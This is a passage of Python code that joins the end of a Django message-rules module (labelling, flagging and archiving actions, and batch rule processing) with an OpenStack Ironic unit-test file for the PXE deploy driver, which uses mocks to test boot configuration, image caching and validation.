return "contact.%s is %s %s" % (self.key, Quantifier.ANY, ", ".join(quoted_values))
def matches(self, message):
if message.contact.fields:
contact_value = normalize(message.contact.fields.get(self.key, ""))
for value in self.values:
if value == contact_value:
return True
return False
def __eq__(self, other):
return other and self.TYPE == other.TYPE and self.key == other.key and self.values == other.values
class Action(object):
"""
An action which can be performed on a message
"""
__metaclass__ = ABCMeta
TYPE = None
CLASS_BY_TYPE = None # lazily initialized below
@classmethod
def from_json(cls, json_obj, context):
if not cls.CLASS_BY_TYPE:
cls.CLASS_BY_TYPE = {
LabelAction.TYPE: LabelAction,
FlagAction.TYPE: FlagAction,
ArchiveAction.TYPE: ArchiveAction,
}
action_type = json_obj["type"]
action_cls = cls.CLASS_BY_TYPE.get(action_type)
if not action_cls: # pragma: no cover
raise ValueError("Unknown action type: %s" % action_type)
return action_cls.from_json(json_obj, context)
@abstractmethod
def to_json(self): # pragma: no cover
pass
@abstractmethod
def get_description(self): # pragma: no cover
pass
def __eq__(self, other):
return self.TYPE == other.TYPE
def __ne__(self, other):
return not self.__eq__(other)
def __hash__(self):
return hash(self.TYPE)
class LabelAction(Action):
"""
Adds a label to the message
"""
TYPE = "label"
def __init__(self, label):
self.label = label
@classmethod
def from_json(cls, json_obj, context):
return cls(Label.objects.get(org=context.org, pk=json_obj["label"]))
def to_json(self):
return {"type": self.TYPE, "label": self.label.pk}
def get_description(self):
return "apply label '%s'" % self.label.name
def apply_to(self, org, messages):
for msg in messages:
msg.label(self.label)
if self.label.is_synced:
org.get_backend().label_messages(org, messages, self.label)
def __eq__(self, other):
return self.TYPE == other.TYPE and self.label == other.label
def __hash__(self):
return hash(self.TYPE + str(self.label.pk))
class FlagAction(Action):
"""
Flags the message
"""
TYPE = "flag"
@classmethod
def from_json(cls, json_obj, context):
return cls()
def to_json(self):
return {"type": self.TYPE}
def get_description(self):
return "flag"
def apply_to(self, org, messages):
Message.objects.filter(pk__in=[m.pk for m in messages]).update(is_flagged=True)
org.get_backend().flag_messages(org, messages)
class ArchiveAction(Action):
"""
Archives the message
"""
TYPE = "archive"
@classmethod
def from_json(cls, json_obj, context):
return cls()
def to_json(self):
return {"type": self.TYPE}
def get_description(self):
return "archive"
def apply_to(self, org, messages):
Message.objects.filter(pk__in=[m.pk for m in messages]).update(is_archived=True)
org.get_backend().archive_messages(org, messages)
class Rule(models.Model):
"""
At some point this will become a first class object, but for now it is always attached to a label.
"""
org = models.ForeignKey(Org, verbose_name=_("Organization"), related_name="rules", on_delete=models.PROTECT)
tests = models.TextField()
actions = models.TextField()
@classmethod
def create(cls, org, tests, actions):
return cls.objects.create(org=org, tests=json_encode(tests), actions=json_encode(actions))
@classmethod
def get_all(cls, org):
return org.rules.all()
def get_tests(self):
return get_obj_cacheable(self, "_tests", lambda: self._get_tests())
def _get_tests(self):
return [Test.from_json(t, DeserializationContext(self.org)) for t in json.loads(self.tests)]
def get_tests_description(self):
return _(" and ").join([t.get_description() for t in self.get_tests()])
def get_actions(self):
return get_obj_cacheable(self, "_actions", lambda: self._get_actions())
def _get_actions(self):
return [Action.from_json(a, DeserializationContext(self.org)) for a in json.loads(self.actions)]
def get_actions_description(self):
return _(" and ").join([a.get_description() for a in self.get_actions()])
def matches(self, message):
"""
Returns whether this rule matches the given message, i.e. all of its tests match the message
"""
for test in self.get_tests():
if not test.matches(message):
return False
return True
class BatchProcessor(object):
"""
Applies a set of rules to a batch of messages in a way that allows same actions to be merged and reduces needed
calls to the backend.
"""
def __init__(self, org, rules):
self.org = org
self.rules = rules
self.messages_by_action = defaultdict(set)
def include_messages(self, *messages):
"""
Includes the given messages in this batch processing
:param messages: the messages to include
:return: tuple of the number of rules matched, and the number of actions that will be performed
"""
num_rules_matched = 0
num_actions_deferred = 0
for message in messages:
for rule in self.rules:
if rule.matches(message):
num_rules_matched += 1
for action in rule.get_actions():
self.messages_by_action[action].add(message)
num_actions_deferred += 1
return num_rules_matched, num_actions_deferred
def apply_actions(self):
"""
Applies the actions gathered by this processor
"""
for action, messages in self.messages_by_action.items():
action.apply_to(self.org, messages)
|
|
# coding=utf-8
# Copyright 2013 Hewlett-Packard Development Company, L.P.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Test class for PXE driver."""
import os
import tempfile
import mock
from oslo_config import cfg
from oslo_serialization import jsonutils as json
from ironic.common import boot_devices
from ironic.common import dhcp_factory
from ironic.common import driver_factory
from ironic.common import exception
from ironic.common.glance_service import base_image_service
from ironic.common import keystone
from ironic.common import pxe_utils
from ironic.common import states
from ironic.common import utils
from ironic.conductor import task_manager
from ironic.conductor import utils as manager_utils
from ironic.drivers.modules import agent_base_vendor
from ironic.drivers.modules import deploy_utils
from ironic.drivers.modules import iscsi_deploy
from ironic.drivers.modules import pxe
from ironic.drivers import utils as driver_utils
from ironic.openstack.common import fileutils
from ironic.tests.conductor import utils as mgr_utils
from ironic.tests.db import base as db_base
from ironic.tests.db import utils as db_utils
from ironic.tests.objects import utils as obj_utils
CONF = cfg.CONF
INST_INFO_DICT = db_utils.get_test_pxe_instance_info()
DRV_INFO_DICT = db_utils.get_test_pxe_driver_info()
DRV_INTERNAL_INFO_DICT = db_utils.get_test_pxe_driver_internal_info()
class PXEValidateParametersTestCase(db_base.DbTestCase):
def test__parse_deploy_info(self):
# make sure we get back the expected things
node = obj_utils.create_test_node(
self.context,
driver='fake_pxe',
instance_info=INST_INFO_DICT,
driver_info=DRV_INFO_DICT,
driver_internal_info=DRV_INTERNAL_INFO_DICT,
)
info = pxe._parse_deploy_info(node)
self.assertIsNotNone(info.get('deploy_ramdisk'))
self.assertIsNotNone(info.get('deploy_kernel'))
self.assertIsNotNone(info.get('image_source'))
self.assertIsNotNone(info.get('root_gb'))
self.assertEqual(0, info.get('ephemeral_gb'))
def test__parse_driver_info_missing_deploy_kernel(self):
# make sure error is raised when info is missing
info = dict(DRV_INFO_DICT)
del info['deploy_kernel']
node = obj_utils.create_test_node(self.context, driver_info=info)
self.assertRaises(exception.MissingParameterValue,
pxe._parse_driver_info,
node)
def test__parse_driver_info_missing_deploy_ramdisk(self):
# make sure error is raised when info is missing
info = dict(DRV_INFO_DICT)
del info['deploy_ramdisk']
node = obj_utils.create_test_node(self.context, driver_info=info)
self.assertRaises(exception.MissingParameterValue,
pxe._parse_driver_info,
node)
def test__parse_driver_info_good(self):
# make sure we get back the expected things
node = obj_utils.create_test_node(self.context,
driver='fake_pxe',
driver_info=DRV_INFO_DICT)
info = pxe._parse_driver_info(node)
self.assertIsNotNone(info.get('deploy_ramdisk'))
self.assertIsNotNone(info.get('deploy_kernel'))
def test__parse_driver_info_backwards_compat(self):
old_drv_info = {}
old_drv_info['pxe_deploy_kernel'] = DRV_INFO_DICT['deploy_kernel']
old_drv_info['pxe_deploy_ramdisk'] = DRV_INFO_DICT['deploy_ramdisk']
node = obj_utils.create_test_node(self.context,
driver='fake_pxe',
driver_info=old_drv_info)
info = pxe._parse_driver_info(node)
self.assertIsNotNone(info.get('deploy_ramdisk'))
self.assertIsNotNone(info.get('deploy_kernel'))
class PXEPrivateMethodsTestCase(db_base.DbTestCase):
def setUp(self):
super(PXEPrivateMethodsTestCase, self).setUp()
n = {
'driver': 'fake_pxe',
'instance_info': INST_INFO_DICT,
'driver_info': DRV_INFO_DICT,
'driver_internal_info': DRV_INTERNAL_INFO_DICT,
}
mgr_utils.mock_the_extension_manager(driver="fake_pxe")
self.node = obj_utils.create_test_node(self.context, **n)
@mock.patch.object(base_image_service.BaseImageService, '_show')
def _test__get_image_info(self, show_mock):
properties = {'properties': {u'kernel_id': u'instance_kernel_uuid',
u'ramdisk_id': u'instance_ramdisk_uuid'}}
expected_info = {'ramdisk':
('instance_ramdisk_uuid',
os.path.join(CONF.pxe.tftp_root,
self.node.uuid,
'ramdisk')),
'kernel':
('instance_kernel_uuid',
os.path.join(CONF.pxe.tftp_root,
self.node.uuid,
'kernel')),
'deploy_ramdisk':
(DRV_INFO_DICT['deploy_ramdisk'],
os.path.join(CONF.pxe.tftp_root,
self.node.uuid,
'deploy_ramdisk')),
'deploy_kernel':
(DRV_INFO_DICT['deploy_kernel'],
os.path.join(CONF.pxe.tftp_root,
self.node.uuid,
'deploy_kernel'))}
show_mock.return_value = properties
image_info = pxe._get_image_info(self.node, self.context)
show_mock.assert_called_once_with('glance://image_uuid',
method='get')
self.assertEqual(expected_info, image_info)
# test with saved info
show_mock.reset_mock()
image_info = pxe._get_image_info(self.node, self.context)
self.assertEqual(expected_info, image_info)
self.assertFalse(show_mock.called)
self.assertEqual('instance_kernel_uuid',
self.node.instance_info.get('kernel'))
self.assertEqual('instance_ramdisk_uuid',
self.node.instance_info.get('ramdisk'))
def test__get_image_info(self):
# Tests when 'is_whole_disk_image' exists in driver_internal_info
self._test__get_image_info()
def test__get_image_info_without_is_whole_disk_image(self):
# Tests when 'is_whole_disk_image' doesn't exists in
# driver_internal_info
del self.node.driver_internal_info['is_whole_disk_image']
self.node.save()
self._test__get_image_info()
@mock.patch.object(base_image_service.BaseImageService, '_show')
def test__get_image_info_whole_disk_image(self, show_mock):
properties = {'properties': None}
expected_info = {'deploy_ramdisk':
(DRV_INFO_DICT['deploy_ramdisk'],
os.path.join(CONF.pxe.tftp_root,
self.node.uuid,
'deploy_ramdisk')),
'deploy_kernel':
(DRV_INFO_DICT['deploy_kernel'],
os.path.join(CONF.pxe.tftp_root,
self.node.uuid,
'deploy_kernel'))}
show_mock.return_value = properties
self.node.driver_internal_info['is_whole_disk_image'] = True
image_info = pxe._get_image_info(self.node, self.context)
self.assertEqual(expected_info, image_info)
@mock.patch.object(iscsi_deploy, 'build_deploy_ramdisk_options')
@mock.patch.object(pxe_utils, '_build_pxe_config')
def _test_build_pxe_config_options(self, build_pxe_mock, deploy_opts_mock,
whle_dsk_img=False,
ipxe_enabled=False):
self.config(pxe_append_params='test_param', group='pxe')
# NOTE: right '/' should be removed from url string
self.config(api_url='http://192.168.122.184:6385', group='conductor')
self.config(disk_devices='sda', group='pxe')
fake_deploy_opts = {
'iscsi_target_iqn': 'fake-iqn',
'deployment_id': 'fake-deploy-id',
'deployment_key': 'fake-deploy-key',
'disk': 'fake-disk',
'ironic_api_url': 'fake-api-url',
'boot_option': 'netboot',
'boot_mode': 'bios',
'coreos.configdrive': 0,
}
deploy_opts_mock.return_value = fake_deploy_opts
self.node.driver_internal_info['is_whole_disk_image'] = whle_dsk_img
tftp_server = CONF.pxe.tftp_server
if ipxe_enabled:
http_url = 'http://192.1.2.3:1234'
self.config(ipxe_enabled=True, group='pxe')
self.config(http_url=http_url, group='pxe')
deploy_kernel = os.path.join(http_url, self.node.uuid,
'deploy_kernel')
deploy_ramdisk = os.path.join(http_url, self.node.uuid,
'deploy_ramdisk')
kernel = os.path.join(http_url, self.node.uuid, 'kernel')
ramdisk = os.path.join(http_url, self.node.uuid, 'ramdisk')
root_dir = CONF.pxe.http_root
else:
deploy_kernel = os.path.join(CONF.pxe.tftp_root, self.node.uuid,
'deploy_kernel')
deploy_ramdisk = os.path.join(CONF.pxe.tftp_root, self.node.uuid,
'deploy_ramdisk')
kernel = os.path.join(CONF.pxe.tftp_root, self.node.uuid,
'kernel')
ramdisk = os.path.join(CONF.pxe.tftp_root, self.node.uuid,
'ramdisk')
root_dir = CONF.pxe.tftp_root
if whle_dsk_img:
ramdisk = 'no_ramdisk'
kernel = 'no_kernel'
expected_options = {
'ari_path': ramdisk,
'deployment_ari_path': deploy_ramdisk,
'pxe_append_params': 'test_param',
'aki_path': kernel,
'deployment_aki_path': deploy_kernel,
'tftp_server': tftp_server,
'boot_option': 'netboot',
'ipa-api-url': CONF.conductor.api_url,
'ipa-driver-name': self.node.driver,
'boot_mode': 'bios',
}
expected_options.update(fake_deploy_opts)
image_info = {'deploy_kernel': ('deploy_kernel',
os.path.join(root_dir,
self.node.uuid,
'deploy_kernel')),
'deploy_ramdisk': ('deploy_ramdisk',
os.path.join(root_dir,
self.node.uuid,
'deploy_ramdisk')),
'kernel': ('kernel_id',
os.path.join(root_dir,
self.node.uuid,
'kernel')),
'ramdisk': ('ramdisk_id',
os.path.join(root_dir,
self.node.uuid,
'ramdisk'))}
options = pxe._build_pxe_config_options(self.node,
image_info,
self.context)
self.assertEqual(expected_options, options)
def test__build_pxe_config_options(self):
self._test_build_pxe_config_options(whle_dsk_img=True,
ipxe_enabled=False)
def test__build_pxe_config_options_ipxe(self):
self._test_build_pxe_config_options(whle_dsk_img=True,
ipxe_enabled=True)
def test__build_pxe_config_options_without_is_whole_disk_image(self):
del self.node.driver_internal_info['is_whole_disk_image']
self.node.save()
self._test_build_pxe_config_options(whle_dsk_img=False,
ipxe_enabled=False)
@mock.patch.object(iscsi_deploy, 'build_deploy_ramdisk_options')
@mock.patch.object(pxe_utils, '_build_pxe_config')
def test__build_pxe_config_options_whole_disk_image(self,
build_pxe_mock,
deploy_opts_mock,
ipxe_enabled=False):
self.config(pxe_append_params='test_param', group='pxe')
# NOTE: right '/' should be removed from url string
self.config(api_url='http://192.168.122.184:6385', group='conductor')
self.config(disk_devices='sda', group='pxe')
fake_deploy_opts = {'iscsi_target_iqn': 'fake-iqn',
'deployment_id': 'fake-deploy-id',
'deployment_key': 'fake-deploy-key',
'disk': 'fake-disk',
'ironic_api_url': 'fake-api-url',
'coreos.configdrive': 0}
deploy_opts_mock.return_value = fake_deploy_opts
tftp_server = CONF.pxe.tftp_server
if ipxe_enabled:
http_url = 'http://192.1.2.3:1234'
self.config(ipxe_enabled=True, group='pxe')
self.config(http_url=http_url, group='pxe')
deploy_kernel = os.path.join(http_url, self.node.uuid,
'deploy_kernel')
deploy_ramdisk = os.path.join(http_url, self.node.uuid,
'deploy_ramdisk')
root_dir = CONF.pxe.http_root
else:
deploy_kernel = os.path.join(CONF.pxe.tftp_root, self.node.uuid,
'deploy_kernel')
deploy_ramdisk = os.path.join(CONF.pxe.tftp_root, self.node.uuid,
'deploy_ramdisk')
root_dir = CONF.pxe.tftp_root
expected_options = {
'deployment_ari_path': deploy_ramdisk,
'pxe_append_params': 'test_param',
'deployment_aki_path': deploy_kernel,
'tftp_server': tftp_server,
'aki_path': 'no_kernel',
'ari_path': 'no_ramdisk',
'ipa-api-url': CONF.conductor.api_url,
'ipa-driver-name': self.node.driver,
}
expected_options.update(fake_deploy_opts)
image_info = {'deploy_kernel': ('deploy_kernel',
os.path.join(root_dir,
self.node.uuid,
'deploy_kernel')),
'deploy_ramdisk': ('deploy_ramdisk',
os.path.join(root_dir,
self.node.uuid,
'deploy_ramdisk')),
}
self.node.driver_internal_info['is_whole_disk_image'] = True
options = pxe._build_pxe_config_options(self.node,
image_info,
self.context)
self.assertEqual(expected_options, options)
def test_get_token_file_path(self):
node_uuid = self.node.uuid
self.assertEqual('/tftpboot/token-' + node_uuid,
pxe._get_token_file_path(node_uuid))
@mock.patch.object(deploy_utils, 'fetch_images')
def test__cache_tftp_images_master_path(self, mock_fetch_image):
temp_dir = tempfile.mkdtemp()
self.config(tftp_root=temp_dir, group='pxe')
self.config(tftp_master_path=os.path.join(temp_dir,
'tftp_master_path'),
group='pxe')
image_path = os.path.join(temp_dir, self.node.uuid,
'deploy_kernel')
image_info = {'deploy_kernel': ('deploy_kernel', image_path)}
fileutils.ensure_tree(CONF.pxe.tftp_master_path)
pxe._cache_ramdisk_kernel(None, self.node, image_info)
mock_fetch_image.assert_called_once_with(None,
mock.ANY,
[('deploy_kernel',
image_path)],
True)
@mock.patch.object(pxe, 'TFTPImageCache', lambda: None)
@mock.patch.object(fileutils, 'ensure_tree')
@mock.patch.object(deploy_utils, 'fetch_images')
def test__cache_ramdisk_kernel(self, mock_fetch_image, mock_ensure_tree):
self.config(ipxe_enabled=False, group='pxe')
fake_pxe_info = {'foo': 'bar'}
expected_path = os.path.join(CONF.pxe.tftp_root, self.node.uuid)
pxe._cache_ramdisk_kernel(self.context, self.node, fake_pxe_info)
mock_ensure_tree.assert_called_with(expected_path)
mock_fetch_image.assert_called_once_with(self.context, mock.ANY,
fake_pxe_info.values(), True)
@mock.patch.object(pxe, 'TFTPImageCache', lambda: None)
@mock.patch.object(fileutils, 'ensure_tree')
@mock.patch.object(deploy_utils, 'fetch_images')
def test__cache_ramdisk_kernel_ipxe(self, mock_fetch_image,
mock_ensure_tree):
self.config(ipxe_enabled=True, group='pxe')
fake_pxe_info = {'foo': 'bar'}
expected_path = os.path.join(CONF.pxe.http_root, self.node.uuid)
pxe._cache_ramdisk_kernel(self.context, self.node, fake_pxe_info)
mock_ensure_tree.assert_called_with(expected_path)
mock_fetch_image.assert_called_once_with(self.context, mock.ANY,
fake_pxe_info.values(),
True)
@mock.patch.object(pxe.LOG, 'error')
def test_validate_boot_option_for_uefi_exc(self, mock_log):
properties = {'capabilities': 'boot_mode:uefi'}
instance_info = {"boot_option": "netboot"}
self.node.properties = properties
self.node.instance_info['capabilities'] = instance_info
self.node.driver_internal_info['is_whole_disk_image'] = True
self.assertRaises(exception.InvalidParameterValue,
pxe.validate_boot_option_for_uefi,
self.node)
self.assertTrue(mock_log.called)
@mock.patch.object(pxe.LOG, 'error')
def test_validate_boot_option_for_uefi_noexc_one(self, mock_log):
properties = {'capabilities': 'boot_mode:uefi'}
instance_info = {"boot_option": "local"}
self.node.properties = properties
self.node.instance_info['capabilities'] = instance_info
self.node.driver_internal_info['is_whole_disk_image'] = True
pxe.validate_boot_option_for_uefi(self.node)
self.assertFalse(mock_log.called)
@mock.patch.object(pxe.LOG, 'error')
def test_validate_boot_option_for_uefi_noexc_two(self, mock_log):
properties = {'capabilities': 'boot_mode:bios'}
instance_info = {"boot_option": "local"}
self.node.properties = properties
self.node.instance_info['capabilities'] = instance_info
self.node.driver_internal_info['is_whole_disk_image'] = True
pxe.validate_boot_option_for_uefi(self.node)
self.assertFalse(mock_log.called)
@mock.patch.object(pxe.LOG, 'error')
def test_validate_boot_option_for_uefi_noexc_three(self, mock_log):
properties = {'capabilities': 'boot_mode:uefi'}
instance_info = {"boot_option": "local"}
self.node.properties = properties
self.node.instance_info['capabilities'] = instance_info
self.node.driver_internal_info['is_whole_disk_image'] = False
pxe.validate_boot_option_for_uefi(self.node)
self.assertFalse(mock_log.called)
class PXEDriverTestCase(db_base.DbTestCase):
def setUp(self):
super(PXEDriverTestCase, self).setUp()
self.context.auth_token = '4562138218392831'
self.temp_dir = tempfile.mkdtemp()
self.config(tftp_root=self.temp_dir, group='pxe')
self.temp_dir = tempfile.mkdtemp()
self.config(images_path=self.temp_dir, group='pxe')
mgr_utils.mock_the_extension_manager(driver="fake_pxe")
instance_info = INST_INFO_DICT
instance_info['deploy_key'] = 'fake-56789'
self.node = obj_utils.create_test_node(
self.context,
driver='fake_pxe',
instance_info=instance_info,
driver_info=DRV_INFO_DICT,
driver_internal_info=DRV_INTERNAL_INFO_DICT)
self.port = obj_utils.create_test_port(self.context,
node_id=self.node.id)
self.config(group='conductor', api_url='http://127.0.0.1:1234/')
def _create_token_file(self):
token_path = pxe._get_token_file_path(self.node.uuid)
open(token_path, 'w').close()
return token_path
def test_get_properties(self):
expected = pxe.COMMON_PROPERTIES
with task_manager.acquire(self.context, self.node.uuid,
shared=True) as task:
self.assertEqual(expected, task.driver.get_properties())
@mock.patch.object(base_image_service.BaseImageService, '_show')
def test_validate_good(self, mock_glance):
mock_glance.return_value = {'properties': {'kernel_id': 'fake-kernel',
'ramdisk_id': 'fake-initr'}}
with task_manager.acquire(self.context, self.node.uuid,
shared=True) as task:
task.driver.deploy.validate(task)
@mock.patch.object(base_image_service.BaseImageService, '_show')
def test_validate_good_whole_disk_image(self, mock_glance):
with task_manager.acquire(self.context, self.node.uuid,
shared=True) as task:
task.node.driver_internal_info['is_whole_disk_image'] = True
task.driver.deploy.validate(task)
def test_validate_fail(self):
info = dict(INST_INFO_DICT)
del info['image_source']
self.node.instance_info = json.dumps(info)
with task_manager.acquire(self.context, self.node.uuid,
shared=True) as task:
task.node['instance_info'] = json.dumps(info)
self.assertRaises(exception.MissingParameterValue,
task.driver.deploy.validate, task)
@mock.patch.object(base_image_service.BaseImageService, '_show')
def test_validate_fail_invalid_boot_mode(self, mock_glance):
properties = {'capabilities': 'boot_mode:foo,cap2:value2'}
mock_glance.return_value = {'properties': {'kernel_id': 'fake-kernel',
'ramdisk_id': 'fake-initr'}}
with task_manager.acquire(self.context, self.node.uuid,
shared=True) as task:
task.node.properties = properties
self.assertRaises(exception.InvalidParameterValue,
task.driver.deploy.validate, task)
@mock.patch.object(base_image_service.BaseImageService, '_show')
def test_validate_fail_invalid_config_uefi_ipxe(self, mock_glance):
properties = {'capabilities': 'boot_mode:uefi,cap2:value2'}
mock_glance.return_value = {'properties': {'kernel_id': 'fake-kernel',
'ramdisk_id': 'fake-initr'}}
self.config(ipxe_enabled=True, group='pxe')
self.config(http_url='dummy_url', group='pxe')
with task_manager.acquire(self.context, self.node.uuid,
shared=True) as task:
task.node.properties = properties
self.assertRaises(exception.InvalidParameterValue,
task.driver.deploy.validate, task)
def test_validate_fail_invalid_config_uefi_whole_disk_image(self):
properties = {'capabilities': 'boot_mode:uefi,boot_option:netboot'}
instance_info = {"boot_option": "netboot"}
with task_manager.acquire(self.context, self.node.uuid,
shared=True) as task:
task.node.properties = properties
task.node.instance_info['capabilities'] = instance_info
task.node.driver_internal_info['is_whole_disk_image'] = True
self.assertRaises(exception.InvalidParameterValue,
task.driver.deploy.validate, task)
@mock.patch.object(base_image_service.BaseImageService, '_show')
def test_validate_fail_invalid_boot_option(self, mock_glance):
properties = {'capabilities': 'boot_option:foo,dog:wuff'}
mock_glance.return_value = {'properties': {'kernel_id': 'fake-kernel',
'ramdisk_id': 'fake-initr'}}
with task_manager.acquire(self.context, self.node.uuid,
shared=True) as task:
task.node.properties = properties
self.assertRaises(exception.InvalidParameterValue,
task.driver.deploy.validate, task)
def test_validate_fail_no_port(self):
new_node = obj_utils.create_test_node(
self.context,
uuid='aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee',
driver='fake_pxe', instance_info=INST_INFO_DICT,
driver_info=DRV_INFO_DICT)
with task_manager.acquire(self.context, new_node.uuid,
shared=True) as task:
self.assertRaises(exception.MissingParameterValue,
task.driver.deploy.validate, task)
@mock.patch.object(base_image_service.BaseImageService, '_show')
@mock.patch.object(keystone, 'get_service_url')
def test_validate_good_api_url_from_config_file(self, mock_ks,
mock_glance):
mock_glance.return_value = {'properties': {'kernel_id': 'fake-kernel',
'ramdisk_id': 'fake-initr'}}
# not present in the keystone catalog
mock_ks.side_effect = exception.KeystoneFailure
with task_manager.acquire(self.context, self.node.uuid,
shared=True) as task:
task.driver.deploy.validate(task)
self.assertFalse(mock_ks.called)
@mock.patch.object(base_image_service.BaseImageService, '_show')
@mock.patch.object(keystone, 'get_service_url')
def test_validate_good_api_url_from_keystone(self, mock_ks, mock_glance):
mock_glance.return_value = {'properties': {'kernel_id': 'fake-kernel',
'ramdisk_id': 'fake-initr'}}
# present in the keystone catalog
mock_ks.return_value = 'http://127.0.0.1:1234'
# not present in the config file
self.config(group='conductor', api_url=None)
with task_manager.acquire(self.context, self.node.uuid,
shared=True) as task:
task.driver.deploy.validate(task)
mock_ks.assert_called_once_with()
@mock.patch.object(keystone, 'get_service_url')
def test_validate_fail_no_api_url(self, mock_ks):
# not present in the keystone catalog
mock_ks.side_effect = exception.KeystoneFailure
# not present in the config file
self.config(group='conductor', api_url=None)
with task_manager.acquire(self.context, self.node.uuid,
shared=True) as task:
self.assertRaises(exception.InvalidParameterValue,
task.driver.deploy.validate, task)
mock_ks.assert_called_once_with()
@mock.patch.object(base_image_service.BaseImageService, '_show')
def test_validate_fail_no_image_kernel_ramdisk_props(self, mock_glance):
mock_glance.return_value = {'properties': {}}
with task_manager.acquire(self.context, self.node.uuid,
shared=True) as task:
self.assertRaises(exception.MissingParameterValue,
task.driver.deploy.validate,
task)
@mock.patch.object(base_image_service.BaseImageService, '_show')
def test_validate_fail_glance_image_doesnt_exists(self, mock_glance):
mock_glance.side_effect = exception.ImageNotFound('not found')
with task_manager.acquire(self.context, self.node.uuid,
shared=True) as task:
self.assertRaises(exception.InvalidParameterValue,
task.driver.deploy.validate, task)
@mock.patch.object(base_image_service.BaseImageService, '_show')
def test_validate_fail_glance_conn_problem(self, mock_glance):
exceptions = (exception.GlanceConnectionFailed('connection fail'),
exception.ImageNotAuthorized('not authorized'),
exception.Invalid('invalid'))
mock_glance.side_effect = exceptions
for exc in exceptions:
with task_manager.acquire(self.context, self.node.uuid,
shared=True) as task:
self.assertRaises(exception.InvalidParameterValue,
task.driver.deploy.validate, task)
@mock.patch.object(base_image_service.BaseImageService, '_show')
def test_validate_invalid_root_device_hints(self, mock_glance):
mock_glance.return_value = {'properties': {'kernel_id': 'fake-kernel',
'ramdisk_id': 'fake-initr'}}
with task_manager.acquire(self.context, self.node.uuid,
shared=True) as task:
task.node.properties['root_device'] = {'size': 'not-int'}
self.assertRaises(exception.InvalidParameterValue,
task.driver.deploy.validate, task)
def test_vendor_passthru_validate_good(self):
with task_manager.acquire(self.context, self.node.uuid,
shared=True) as task:
task.driver.vendor.validate(task, method='pass_deploy_info',
address='123456', iqn='aaa-bbb',
key='fake-56789')
def test_vendor_passthru_validate_fail(self):
with task_manager.acquire(self.context, self.node.uuid,
shared=True) as task:
self.assertRaises(exception.InvalidParameterValue,
task.driver.vendor.validate,
task, method='pass_deploy_info',
key='fake-56789')
def test_vendor_passthru_validate_key_notmatch(self):
with task_manager.acquire(self.context, self.node.uuid,
shared=True) as task:
self.assertRaises(exception.InvalidParameterValue,
task.driver.vendor.validate,
task, method='pass_deploy_info',
address='123456', iqn='aaa-bbb',
key='fake-12345')
@mock.patch.object(iscsi_deploy, 'validate_pass_bootloader_info_input',
autospec=True)
def test_vendor_passthru_pass_bootloader_install_info(self,
validate_mock):
with task_manager.acquire(self.context, self.node.uuid,
shared=True) as task:
kwargs = {'address': '1.2.3.4', 'key': 'fake-key',
'status': 'SUCCEEDED', 'error': ''}
task.driver.vendor.validate(
task, method='pass_bootloader_install_info', **kwargs)
validate_mock.assert_called_once_with(task, kwargs)
@mock.patch.object(iscsi_deploy, 'validate_bootloader_install_status',
autospec=True)
@mock.patch.object(iscsi_deploy, 'finish_deploy', autospec=True)
def test_pass_bootloader_install_info(self, finish_deploy_mock,
validate_input_mock):
kwargs = {'method': 'pass_deploy_info', 'address': '123456'}
self.node.provision_state = states.DEPLOYWAIT
self.node.target_provision_state = states.ACTIVE
self.node.save()
with task_manager.acquire(self.context, self.node.uuid,
shared=False) as task:
task.driver.vendor.pass_bootloader_install_info(task, **kwargs)
finish_deploy_mock.assert_called_once_with(task, '123456')
validate_input_mock.assert_called_once_with(task, kwargs)
@mock.patch.object(pxe, '_get_image_info')
@mock.patch.object(pxe, '_cache_ramdisk_kernel')
@mock.patch.object(pxe, '_build_pxe_config_options')
@mock.patch.object(pxe_utils, 'create_pxe_config')
def test_prepare(self, mock_pxe_config,
mock_build_pxe, mock_cache_r_k,
mock_img_info):
mock_build_pxe.return_value = None
mock_img_info.return_value = None
mock_pxe_config.return_value = None
mock_cache_r_k.return_value = None
with task_manager.acquire(self.context, self.node.uuid) as task:
task.driver.deploy.prepare(task)
mock_img_info.assert_called_once_with(task.node,
self.context)
mock_pxe_config.assert_called_once_with(
task, None, CONF.pxe.pxe_config_template)
mock_cache_r_k.assert_called_once_with(self.context,
task.node, None)
@mock.patch.object(pxe, '_get_image_info')
@mock.patch.object(pxe, '_cache_ramdisk_kernel')
@mock.patch.object(pxe, '_build_pxe_config_options')
@mock.patch.object(pxe_utils, 'create_pxe_config')
@mock.patch.object(pxe_utils, 'get_pxe_config_file_path')
@mock.patch.object(deploy_utils, 'switch_pxe_config')
def test_prepare_node_active_missing_root_uuid(self,
mock_switch,
mock_pxe_get_cfg,
mock_pxe_config,
mock_build_pxe,
mock_cache_r_k,
mock_img_info):
mock_build_pxe.return_value = None
mock_img_info.return_value = None
self.node.provision_state = states.ACTIVE
self.node.save()
with task_manager.acquire(self.context, self.node.uuid) as task:
task.driver.deploy.prepare(task)
mock_img_info.assert_called_once_with(task.node,
self.context)
mock_pxe_config.assert_called_once_with(
task, None, CONF.pxe.pxe_config_template)
mock_cache_r_k.assert_called_once_with(self.context,
task.node, None)
self.assertFalse(mock_pxe_get_cfg.called)
self.assertFalse(mock_switch.called)
@mock.patch.object(pxe, '_get_image_info')
@mock.patch.object(pxe, '_cache_ramdisk_kernel')
@mock.patch.object(pxe, '_build_pxe_config_options')
@mock.patch.object(pxe_utils, 'create_pxe_config')
@mock.patch.object(pxe_utils, 'get_pxe_config_file_path')
@mock.patch.object(deploy_utils, 'switch_pxe_config')
@mock.patch.object(driver_utils, 'get_node_capability')
def _test_prepare_node_active(self,
mock_get_cap,
mock_switch,
mock_pxe_get_cfg,
mock_pxe_config,
mock_build_pxe,
mock_cache_r_k,
mock_img_info):
mock_build_pxe.return_value = None
mock_img_info.return_value = None
mock_pxe_get_cfg.return_value = '/path'
mock_get_cap.return_value = None
self.node.provision_state = states.ACTIVE
self.node.save()
with task_manager.acquire(self.context, self.node.uuid) as task:
task.driver.deploy.prepare(task)
mock_img_info.assert_called_once_with(task.node,
self.context)
mock_pxe_config.assert_called_once_with(
task, None, CONF.pxe.pxe_config_template)
mock_cache_r_k.assert_called_once_with(self.context,
task.node, None)
mock_pxe_get_cfg.assert_called_once_with(task.node.uuid)
